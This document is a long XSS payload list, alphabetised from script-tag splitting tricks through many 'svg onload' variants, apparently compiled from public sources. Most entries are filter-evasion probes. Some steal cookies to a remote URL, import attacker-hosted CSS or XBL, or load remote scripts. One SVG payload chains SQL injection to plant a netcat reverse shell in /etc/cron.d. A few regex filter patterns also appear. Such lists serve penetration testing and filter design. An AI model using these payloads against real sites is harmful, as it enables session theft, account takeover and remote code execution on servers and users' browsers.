- <scr<script>ipt>alert(1)</scr</script>ipt>
- <scr<script>ipt>alert(1)</scr<script>ipt>
- <scrscriptipt>alert(1)</scrscriptipt>
- <scrscriptipt>alert(1)</scrscriptipt>
- <sCR<script>iPt>alert(1)</SCr</script>IPt>
- <scr<script>ipt>alert(1)</scr<script>ipt>F
- <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
- <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
- <scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
- <scr<script>ipt>alert(/Xss/)</scr</script>ipt>
- <scr<script>ipt>alert(‘XSS’)</scr</script>ipt>
- <scr<script>ipt>alert(‘XSS’)</scr<script>ipt>
- <scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
- <scr<script>ipt>alert(“XSS”)</scr<script>ipt>
- </scr</script>ipt><ifr<iframeame/onload=prompt()>whs
- <scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
- <scr<script>rip>alalertert</scr</script>rip>
- <sc<script>ript>alert(123)</sc</script>ript>
- <sc<script>ript>alert(1)</script>
- <select autofocus onfocus=alert`1`
- <select autofocus onfocus=alert(1)>
- <select autofocus onfocus=alert(1)>//INJECTX
- <select id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><select onchange=alert(1)><option>1<option>2
- <select onchange=alert(106)><option>1<option>2
- <select onchange=alert(1)><option>1<option>2
- <select onclick=”popup=1;”>
- <select onclick=popup=1;>
- ‘></select><script>alert(123)</script>
- ‘></select><script>alert(123)</script>
- ‘></select><script>alert(XSS)</script>
- <set attributeName=”onmouseover” to=”alert(1)”/>
- <set attributeName=”xlink:href” to=”javascript:alert(1)” begin=”1s” />
- Set.constructor(‘ale’+’rt(13)’)();
- Set.constructor`alert\x28document.domain\x29```
- Set.constructor`al\x65rt\x2814\x29```;
- setImmediate()
- setinterval()
- setInterval(‘ale’+’rt(10)’);
- setInterval`alert\x28document.domain\x29`
- setInterval(code, 0)
- setInterval(‘location.hash=”??????????”[i++%10]’,i=99)
- setInterval(location.search.slice(1));
- setInterval(x,5000);
- setTimeout()
- setTimeout`alert(1);//${1000}`
- setTimeout(‘ale’+’rt(2)’);
- setTimeout([‘alert(/@garethheyes/)’]);
- setTimeout`alert\x28document.domain\x29`
- setTimeout([‘confirm(4)’]);
- setTimeout(location)
- setTimeout(location.search.slice(1));
- setTimeout// (name// ,0)
- setTimeout(URL.slice(-7))//#alert()
- <<! — #set var=”x” value=”svg onload=alert(54)” →<! — #echo var=”x” →>
- <ShowAbout>1</ShowAbout>
- <ShowDuration>1</ShowDuration>
- <ShowElapsedTime>1</ShowElapsedTime>
- <ShowFFRW>1</ShowFFRW>
- <ShowLoadingMov>1</ShowLoadingMov>
- Single Input (script-based)
- ?skinName=asfunction:getURL,javascript:alert(1)//”,
- /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
- /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
- <slideslow><image img=javascript:alert(XSS@%2Bdocument.domain caption= /></slideshow>
- <s[NULL]cript>confirm(1)</s[NULL]cript>’>Clickme</a>
- ;/script>
- <s/onclick=alert()>b
- source+location.hash[1]+1+location.hash[2]>#()
- source+location.hash.substr(1)>#(1)
- <source onclick=popup=1; ><frameset/onload=popup=1;>
- {“source”:{},”__proto__”:{“source”:”$`onerror=prompt(1)>”}}
- <source srcset=”x”><img onerror=”confirm(5)”></picture>
- Space Insertion##<script%20TEST>alert(1)</script%20TESTTEST>
- <span class=”pln”></span><span class=”tag”><formaction</span><span class=”pun”>=</span><span class=”atv”>&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><span class=”tag”>><button></span><span class=”pln”>CLICK</span>
- <span class=”pln”> </span><span class=”tag”><formaction</span><span class=”pun”>=</span><span class=”atv”>&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><span class=”tag”>><button></span><span class=”pln”>CLICK</span>
- <span class=”qm_ico_print” id=”mail_print” title=”L” onclick=”window.open(‘/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&’);”></span>
- <SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
- <span class=”xmsw” title=”dd” onmouseout=window.location=’http://test/test.php?c='+document.cookie>test</span>
- <SPAN class=xmsw title=dd onmouseout=window.location=’http://www,xfydyt.com'>test</span>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <span id=”x” data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
- <span onclick=”javascript:changeFont(2);”>
- <span/onmouseover=confirm(1)>renwax23
- “></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
- <SPAN “ style=”display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo=”></span>renwax23
- SRC=
<IMG 6;avascript:alert('XSS')>
- ‘/src=[^<]*base64[^<]*(?=\>)/Uis’,
- “src=data:,alert%2823%29></script><script x=”
- SRC’” →<! — #exec cmd=”/bin/echo
- src=”http://www.site.com/XSS.js"></script>
- src=”http://www.site.com/XSS.js"></script>
- <sRCIpt>alert(/123/)</ScRpT>
- src=JaVaSCript:prompt(132)
- <s<script>cript>…</s</script>cript>
- [S] = stripped char or string
- sstyle=foobar”tstyle=”foobar”ystyle=”foobar”lstyle=”foobar”estyle=”foobar”=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=”
- {!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
- stop, open, print && confirm(1)
- String.fromCharCode(0x61,0x62)
- String.fromCharCode(0xffff+0x3d)
- (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41))
- String.raw(a=alert(1),1,2)
- String.raw`jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e`;
- <% string str_a = rrequest.getParameter(“a”);%>
- </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
- </style  ><script   :-(>/**/confirm(document.location)/**/</script   :-(
- “+style%3d”x%3aexpression(alert(1))+
- <STYLE>a{background:url(‘s1’ ‘s2)}@import javascript:javascript:alert(1);’);}</STYLE>
- /style=a:expression(/*'/-
- <STYLE><! — a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>} →</style></DIV>
- <STYLE> a { width: expression(alert(‘XSS’)) } </STYLE>
- <style>*{background-image:url(‘\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29’)}</style><% style=behavior:url(: onreadystatechange=alert(1)>
- <style>body:after{content: ��\61\6c\65\72\74\28\31\29��}</style><script>eval(eval(document.styleSheets[0].cssRules[0].style.content))</script>
- <style>body{background-color:expression\(alert(1))}</style>
- <style>body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }</style>
- <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo “<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead…<hr />”; phpinfo(); __halt_compiler(); ?></h1>
- <;STYLE>;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
- <STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <style>BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss")}</style>
- <STYLE>BODY{-moz-binding:url(“http://xxxx.com/xssmoz.xml#xss")}</STYLE>
- <style>body{width:��xpression(parent.document.write(unescape(‘%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E’)));}</style>
- style=color: expression(alert(0));” a=”
- /style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- /style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
- ‘/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis’,
- <style>*{font-family:’Serif}’;x[value=expression(confirm(URL=1));]{color:red}</style>
- <style>img{background-image:url(‘javascript:alert(location)’)}</style>
- <style><img src=”</style><img src=x “><object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <style><img src=”</style><img src=x onerror=alert(1)//”>
- <style><img src=”</style><img src=x onerror=alert(123)//”>
- “<style><img src=’</style><img src=x onerror=alert(“document.cookie”)//’>
- <style><img src=”</style><img src=x onerror=alert(XSS)//”>
- <style><img src=”</style><img src=x onerror=javascript:alert(1)//”>
- <style>@import ‘//attacker/test.css’</style>
- <STYLE>@import’%(css)s’;</STYLE>
- <style>*[{}@import’%(css)s?]</style>X
- <style>@import “data:,*%7bx:expression(javascript:alert(1))%7D”;</style>
- <style>@import “data:,*%7bx:expression(write(1))%7D”;</style>
- <style>@import//evil? >>>steal me!<<< scriptless
- <;STYLE>;@import’;http://ha.ckers.org/xss.css';;<;/STYLE>;
- <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE>
- <STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
- <STYLE>@import’http://host/css';</STYLE>
- <style>@import’http://www.securitycompass.com/xss.css';</style>
- <STYLE>@import’http://xss.cx/xss.css';</STYLE>
- <STYLE>@import’http://xxxx.com/xss.css';</STYLE>
- <STYLE>@importjavasc ipt:alert(“XSS”);</STYLE>
- <STYLE>@im\port’\ja\vasc\ript:alert(“X3SS”)’;</STYLE>
- <style>@im\port’\ja\vasc\ript:alert(“xss”)’;</style>
- <style>@import javascript:alert(xss);</style>
- <style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
- <style>@import’javascript:alert(“XSS”)’;</style>
- <;STYLE>;@im\port’;\ja\vasc\ript:alert(“;XSS”;)’;;<;/STYLE>;
- <STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
- <STYLE>@import’javascript:alert(“XSS”)’;</STYLE>
- “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>
- “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- <STYLE>@im\port’\ja\vasc\ript:confirm(document.location)’;</STYLE>
- “><STYLE>@import”javascript:confirm(document.location)”;</STYLE>
- <style>@im\port’\ja\vasc\ript:document.vulnerable=true’;</style>
- <style>*[{}@import’test.css?]{color: green;}</style>X
- <style>@imp\ort url(“http://attacker.org/malicious.css");</style>
- <style>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
- <style>@keyframes x{}</style>
- <style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
- <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=alert`1`> %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E “</script><script>alert(String.fromCharCode(88,83,83))</script> <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”> <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
- <STYLE>li+{list-style-image:url(“javascript:alert(1)”);}</STYLE><UL><LI>1
- <;STYLE>;li {list-style-image: url(“;javascript:alert('XSS')”;);}<;/STYLE>;<;UL>;<;LI>;XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’);</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(XSS)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>
- <style>li {list-style-image: url(“javascript:document.vulnerable=true;”);</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:javascript:alert(1)”);}</STYLE><UL><LI>XSS
- <style/></style><img src=1 onerror=confirm(1)></style>
- style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=”
- <style>*{-o-link:’data:text/html,<svg/onload=confirm(5)>’;-o-link-source:current}</style><a href=1>aaa
- <style/onload=confirm(1)>
- <style/onload = !-confirm(1)>
- <style onload=’execScript(“InputBox+1”,”VbScript”);’>
- <style/onload=”javascript:if(‘[object Object]’=={}&&1==[1])confirm(1);”>
- <style/onload=<! — 	> alert (1)>
- <style/onload=<! — 	> confirm (1)>
- <style/onload=<! — > alert (1)>
- <style/onload=prompt(’XSS’)
- <style/onload=prompt(‘XSS’)
- <style onLoad style onLoad=”javascript:javascript:alert(1)”></style onLoad>
- <style onreadystatechange=javascript:javascript:alert(1);></style>
- <style onReadyStateChange style onReadyStateChange=”javascript:javascript:alert(1)”></style onReadyStateChange>
- <style>p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
- <style>p[foo=bar{}*{-o-link:’javascript:confirm(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
- <style>p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red};</style>
- }</style><script>a=eval;b=alert;a(b(/i/.source));</script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- </style><script>a=eval;b=alert;a(b(/XSS/.source));</script><script>a=eval;b=alert;a(b(/XSS/.source));</script>’”><marquee><h1>XSS by vuolent python</h1></marquee>
- </style ><script :-(>/**/alert(document.location)/**/</script :-(
- </style></script><script>alert(0x000123)</script>
- ‘</style></script><script>alert(0x000123)</script>
- ‘\” →</style></script><script>alert(0x000123)</script>
- \”></style></script><script>alert(0x000123)</script>
- \”>’</style></script><script>alert(0x000123)</script>
- </style></scRipt><scRipt>alert(1)</scRipt>
- ‘“ →</style></scRipt><scRipt>alert(‘XSSPOS ED’)</scRipt>
- “ →</style></script><script>alert(“XSS”)</script>
- <///style///><span %2F onmousemove=’alert(1)’>SPAN
- <///style///><span %2F onmousemove=’confirm(1)’>SPAN
- <style><! — </style><script>alert(‘XSS’);// →</script>
- <style><! — </style><script>document.vulnerable=true;// →</script>
- <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <style></style\x09<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x0A<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x0D<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x20<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x3E<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style>//<! — </style> →*{x:expression(alert(/@jackmasa/))}//<style></style>
- <style>//<! — </style> →*{x:expression(confirm(4))}//<style></style>
- <style>#test{x:expression(alert(/XSS/))}</style>
- </stYle/</titLe/</teXtarEa/</scRipt/ — !>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘X7SS’)”)}</STYLE>
- <;STYLE type=”;text/css”;>;BODY{background:url(“;javascript:alert(‘;XSS’;)”;)}<;/STYLE>;
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(XSS)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:confirm(document.location)”)}</STYLE>
- <style type=”text/css”>BODY{background:url(“javascript:document.vulnerable=true”)}</style>
- <STYLE type=”text/css”>BODY{background:url(“javascript:javascript:alert(1)”)}</STYLE>
- <style type=text/css>@import url(http://www.xxx.com/xss.css);</style>
- <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘X6SS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE TYPE=”text/javascript”>alert(‘X4SS’);</STYLE>
- <STYLE TYPE=”text/javascript”>alert(“XSS”)
- <;STYLE TYPE=”;text/javascript”;>;alert(‘;XSS’;);<;/STYLE>;
- <STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
- <STYLE TYPE=”text/javascript”>alert(XSS);</STYLE>
- <STYLE TYPE=”text/javascript”>confirm(document.location);</STYLE>
- <style type=”text/javascript”>document.vulnerable=true;</style>
- <style TYPE=”text/javascript”>document.vulnerable=true;</style>
- <STYLE TYPE=”text/javascript”>javascript:alert(1);</STYLE>
- <STYLE>width:expression(alert(‘anyunix’));</STYLE>
- <style>*{x:���A����������������(javascript:alert(1))}</style>
- <style>*{x:A(javascript:alert(1))}</style>
- <style>*{x:A(write(1))}</style>
- <style>#x{display:block}#x:target{display:none}@keyframes test {}</style>
- <// style=x:expression\28javascript:alert(1)\29>
- <// style=x:expression\28write(1)\29>
- <// style=x:expression\28write(1)\29>
- </**/style=x:expression\28write(1)\29>
- <// style=x:expression\28write(1)\29> // Works upto IE7 ?http://html5sec.org/#71
- <style>//*{x:expression(alert(/xss/))}//<style></style>
- <;STYLE>;.XSS{background-image:url(“;javascript:alert(‘;XSS’;)”;);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
- <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE>.XSS{background-image:url(“javascript:alert(XSS)”);}</STYLE><A CLASS=XSS></A>
- <STYLE>.XSS{background-image:url(“javascript:confirm(document.location)”);}</STYLE><A CLASS=XSS></A>
- <style>.XSS{background-image:url(“javascript:document.vulnerable=true”);}</STYLE><A CLASS=XSS></a>
- <STYLE>.XSS{background-image:url(“javascript:javascript:alert(1)”);}</STYLE><A CLASS=XSS></A>
- style=\”xss:’” onclick=”alert(1)//’”
- style=xss:’”/onclick=alert(1)//’
- {{(_=’’.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}
- {{(_=””.sub).call.call({}[$=”constructor”].getOwnPropertyDescriptor(_.__proto__,$).value,0,”alert(1)”)()}}
- <svg
- <svg%09%0A%0B%0C%0D%A0%00%20onload
- <svg%09%28%3Bonload=confirm(1);>
- <svg %09onload%09=prompt(1)>
- <svg%0Ao%00nload=%09((pro\u006dpt))()//
- <svg%20onload=eval%28%27/*%27%2bURL%29>#*/alert%28document.domain%29
- <svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
- <svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>
- <svg[9,10,12,13,32,47]onload=alert(1)>
- <svg><animate attributename=x end=180 onend=alert(180)>
- <svg><animate attributename=x end=188 onend=alert(188)>
- <svg><animate attributename=x end=1 onend=alert(44)>
- <svg><animate attributeName=x onbegin=alert(190)>
- <svg><animate href=#k attributename=href to=/ from=data:,alert(60)><script/id=k></script>
- <svg><animate onbegin=alert(189)>
- <svg><animate onbegin=alert(45)> <svg><animate attributeName=x onbegin=alert(450)>
- <svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
- <svg><animation x:href=javascript:alert(1)>
- “><svg/a=#”onload=’/*#*/prompt(1)’
- <svg><a><rect width=100% height=100%>
- <svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
- <svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
- <svg><a><rect width=100% height=100% /><animate attributeName=href to=javascript:alert(1)>
- <svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
- <svg><a><script>alert(1)</a>
- <svg><a xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/>click</a></svg>
- <svg><a xml:base=”javascript:alert(1)//” href=”#”><circle r=”100" /></svg>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(176) to=&>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
- <svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(2)//”></svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”</svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg>
- <Svg> <! [CDATA [> <imagexlink: href = “]]> <img / src = xx: xonerror = alert (2) //”> </ svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg> // By Secalert
- <svg contentScriptType=text/vbs><script>
- <svg contentScriptType=text/vbs><script>MsgBox
- <svg contentScriptType=text/vbs><script>MsgBox+1
- <svg contentScriptType=text/vbs><script>MsgBox”1"<i>
- <svg contentScriptType=text/vbs><script>XSS
- <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
- <svg><div onactivate=alert(‘Xss’)
- <svg><div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
- <svg><doh onload=confirm(1)>
- <svgEonload=alert(1)>
- <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
- <svg id=1 onload=confirm(1)>
- <svg id=alert(1337) onload=eval(id)>
- <svg id=alert(1) onload=eval(id)>
- <svg id=javascript:alert(1337) onload=location=id>
- <svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
- <svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
- <svg id=t:alert(1) name=javascrip onload=location=name+id>
- <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”>
- <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’confirm(1)’%3E%3C/svg%3E”>
- <svg/language=vbs onload=msgbox-1
- <svg onclick=popup=1;>
- <svg/onload%0B=prompt(1)>
- <SVG/ONLOAD=prompt(1)
- <SVG/ONLOAD=prompt(1) // Cross Browser
- <svg </onload =”1> (_=alert,_(1)) “”>
- <svg </onload =”1> (_=alert,_(1337)) “”>
- <svg/onload=%26%23097lert%26lpar;1337)>
- <SVG ONLOAD=alert(1)>
- <SVG ONLOAD=alert(186)>
- <SVG ONLOAD=alert(47)>
- <svg+onload=+”aler%25%37%34(1)”
- <! →<svg onload=alert(1)> →
- <svg onload=”alert(1)”
- <svg onload=alert`1`>
- <svg onload=alert(1)>
- <svg onload=alert(1)//
- <svg/onload=alert(1)
- ?�֡�svg onload��alert�]1�^��
- “><svg onload=alert(1)>
- “><svg onload=alert(1)//
- \<svg/onload=alert`1`\>
- <Svg OnLoad=alert(1)>
- ?�֡�svg onload��alert�]183�^��
- <svg onload=(alert)(1) >//INJECTX
- <svg/onload=alert(1)>//INJECTX
- <svg onload=alert(1)>
- ‘<’s’v’g’ o’n’l’o’a’d’=’a’l’e’r’t’(‘7’)’ ‘>’
- <svg onload=alert(75)>
- “><svg onload=alert(76)//
- <svg/onload=alert(domain)>
- <svg/onload=alert`INJECTX`>
- <svg/onload=alert(`INJECTX`)>
- <svg/onload=alert(/INJECTX/)>
- <svg onload=alert(1)>
- <svg onload=alert(navigator.battery.charging)>
- <svg onload=alert(navigator.battery.dischargingTime)>
- <svg onload=alert(navigator.battery.level)>
- <svg onload=alert(navigator.connection.type)>
- <svg/onload=alert(String.fromCharCode(88,83,83))>
- “><svg/onload=alert(String.fromCharCode(88,83,83))>
- <svg onload=alert(tagName)>
- <svg onload=alert(1)>
- <svg onload=alert(‘XSS’)>
- <svg/onload=alert(‘XSS’)>
- “><svg/onload=alert(/XSS/)
- <svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>”
- <svg/onload=confirm(0);prompt(0);>
- “<svg/onload=confirm(0);prompt(0);>”
- <svg onload=confirm(1)
- <svg/onload=confirm(1)
- “><svg/onload=confirm(58)>”@x.y
- <svg onload=”confirm(7)”>
- “><svg onload=”confirm(7)”>
- “/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
- “\”/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>”
- “><svg/onload=co\u006efir\u006d`1`>
- <svg+onload=+”[DATA]”
- <svg/onload=document.location.href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=’>
- <svg/onload=document.location.href=’https://google.com'>
- <svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
- <svg onload=document.write(‘XSS’)>
- <svg/onload=eval(atob(location.hash.slice(1)))>
- <svg/onload=eval(atob(location.hash.slice(1)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
- <svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
- <svg/onload=eval(atob(URL.slice(-148)))>
- <svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
- <svg onload=eval(document.cookie)>
- <svg onload=eval(location.hash.slice(1)>#alert(1)
- <svg/onload=eval(location.hash.slice(1))>?#alert(1)
- <svg/onload=eval(location.hash.slice(1))>#with(document)
- <svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- <svg+onload=eval(location.hash.substr(1))>#alert(1)
- <svg/onload=eval(name)>
- <svg onload=eval(URL)>
- <svg onload=eval(URL)>//22
- <svg onload=eval(‘/*’+URL)>#*/alert(document.domain)
- <svg+onload=eval(URL.slice(7,15))>
- <svg/onload=eval(URL.slice(-7))//#alert()
- <svg onload=eval(URL.slice(-8))>#alert(1)
- <svg onload=eval(URL.slice(-8))>#alert(1)/”’></script /K><Svg /onload = confirm(`1`)
- <svg onload=eval(window.name)>
- <svg onload=eval(window.name)//
- <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
- <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/UR/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
- <svg onload=fetch(“//HOST/?id=0+union+select’*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh’into+outfile’/etc/cron.d/s’”)>
- <svg onload=innerHTML=location.hash>#<script>alert(1)</script>
- <svg/onload=’javascript0x00:void(0)%00?void(0):confirm(1)’>
- <svg onload=”javascript:alert(123)” xmlns=”#”></svg>
- <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg>
- <svg onload=”javascript:alert(9)” xmlns=”http://www.w3.org/2000/svg"></svg>
- <svg onload=��javascript:alert(9)�� xmlns=��http://www.w3.org/2000/svg��></svg>
- <svg/onload=location=’javas’%2B’cript:’%2B
- <svg/onload=location=javas%2Bcript:%2B
- <svg onload=location=’javascript:alert(1)’>
- <svg/onload=location=’javascript:alert(1)’>
- <svg onload=location=’javas’+’cript:’+’ale’+’rt’+location.hash.substr(1)>#(1)
- <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:
- <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()
- <svg/onload=location=/javas/.source%2B/cript:/.source%2B
- <svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
- <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.
- <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/.
- <svg onload=location=location.hash.substr(1)>#javascript:alert(1)
